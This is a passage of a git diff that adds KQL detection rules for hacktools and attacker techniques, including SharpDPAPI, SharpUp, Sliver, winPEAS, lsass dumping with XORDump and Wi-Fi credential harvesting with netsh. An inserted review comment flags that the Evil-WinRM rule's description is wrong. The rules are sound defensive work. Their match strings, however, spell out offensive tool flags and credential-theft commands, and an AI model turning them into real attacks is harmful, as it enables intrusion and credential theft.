+// Description: Detects usage of the Sharp Chisel via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
new file mode 100644
index 00000000..58362b4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - SharpDPAPI Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
+// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
new file mode 100644
index 00000000..a67a7260
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharPersist Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-15
+// Level: high
+// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
new file mode 100644
index 00000000..2c0342aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpEvtMute Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-07
+// Level: high
+// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
new file mode 100644
index 00000000..3446ac0f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpImpersonation Execution
+// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
new file mode 100644
index 00000000..23bd8274
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpLDAPmonitor Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-30
+// Level: medium
+// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
new file mode 100644
index 00000000..c1d91ab5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpLdapWhoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-29
+// Level: high
+// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+// - Programs that use the same command line flags
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
new file mode 100644
index 00000000..d6473d29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpMove Tool Execution
+// Author: Luca Di Bartolomeo (CrimpSec)
+// Date: 2024-01-29
+// Level: high
+// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
new file mode 100644
index 00000000..3f8e0627
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpUp PrivEsc Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-20
+// Level: critical
+// Description: Detects the use of SharpUp, a tool for local privilege escalation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
new file mode 100644
index 00000000..200d5400
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpView Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: high
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains 
"Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains 
"Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
new file mode 100644
index 00000000..4c431cca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - SharpWSUS/WSUSpendu Execution
+// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-07
+// Level: high
+// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
+// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid="))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
new file mode 100644
index 00000000..a9f6c7d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SILENTTRINITY Stager Execution
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager use via PE metadata
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql
new file mode 100644
index 00000000..ed008cb8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Sliver C2 Implant Activity Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-08-25
+// Level: critical
+// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql
new file mode 100644
index 00000000..f6ad57ad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SOAPHound Execution
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: high
+// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql
new file mode 100644
index 00000000..0375e44c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Stracciatella Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql
new file mode 100644
index 00000000..3daaec2e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - TruffleSnout Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: high
+// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql
new file mode 100644
index 00000000..1475f038
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - winPEAS Execution
+// Author: Georg Lauenstein (sure[secure])
+// Date: 2022-09-19
+// Level: high
+// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql
new file mode 100644
index 00000000..10e49f69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - WinPwn Execution
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-12-04
+// Level: high
+// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql
new file mode 100644
index 00000000..3d84e596
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - WinRM Access Via Evil-WinRM
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql
new file mode 100644
index 00000000..23276ec8
--- /dev/null
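Review bot: The Description line of the Evil-WinRM rule does not describe what the query matches: it talks about logging in over the Remote Desktop Protocol, while the where clause keys on `ruby.exe` with `-i `, `-u ` and `-p ` switches and the tag is attack.t1021.006 (WinRM). A reader triaging an alert from this rule would be misled about the channel being flagged; suggest `// Description: Detects Evil-WinRM style WinRM access via a ruby.exe process started with the -i, -u and -p command line switches`. The three switch substrings are short and unanchored, so the documented level of medium and a false-positives entry for other Ruby scripts using the same flags would be worth carrying into the converted file as well.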
+++ b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Wmiexec Default Powershell Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-08
+// Level: high
+// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql
new file mode 100644
index 00000000..959a6a08
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - XORDump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-28
+// Level: high
+// Description: Detects suspicious use of XORDump process memory dumping utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Another tool that uses the command line switches of XORdump
+
+DeviceProcessEvents
+| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..6a6dc4e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Hardware Model Reconnaissance Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql
new file mode 100644
index 00000000..404ff7a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql
@@ -0,0 +1,10 @@
+// Title: Harvesting Of Wifi Credentials Via Netsh.EXE
+// Author: Andreas Hunkeler (@Karneades), oscd.community
+// Date: 2020-04-20
+// Level: medium
+// Description: Detect the harvesting of wifi credentials using netsh.exe
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hh_exe_execution.kql b/KQL/rules/windows/process_creation/hh_exe_execution.kql
new file mode 100644
index 00000000..98af0a14
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hh_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: HH.EXE Execution
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Detects the execution of "hh.exe" to open ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+// - False positives are expected with legitimate ".CHM"
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql
new file mode 100644
index 00000000..6781bb4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Hidden Powershell in Link File Pattern
+// Author: frack113
+// Date: 2022-02-06
+// Level: medium
+// Description: Detects events that appear when a user click on a link file with a powershell command in it
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate commands in .lnk files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql
new file mode 100644
index 00000000..22143a10
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql
@@ -0,0 +1,13 @@
+// Title: Hiding Files with Attrib.exe
+// Author: Sami Ruohonen
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects usage of attrib.exe to hide files from users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+// False Positives:
+// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
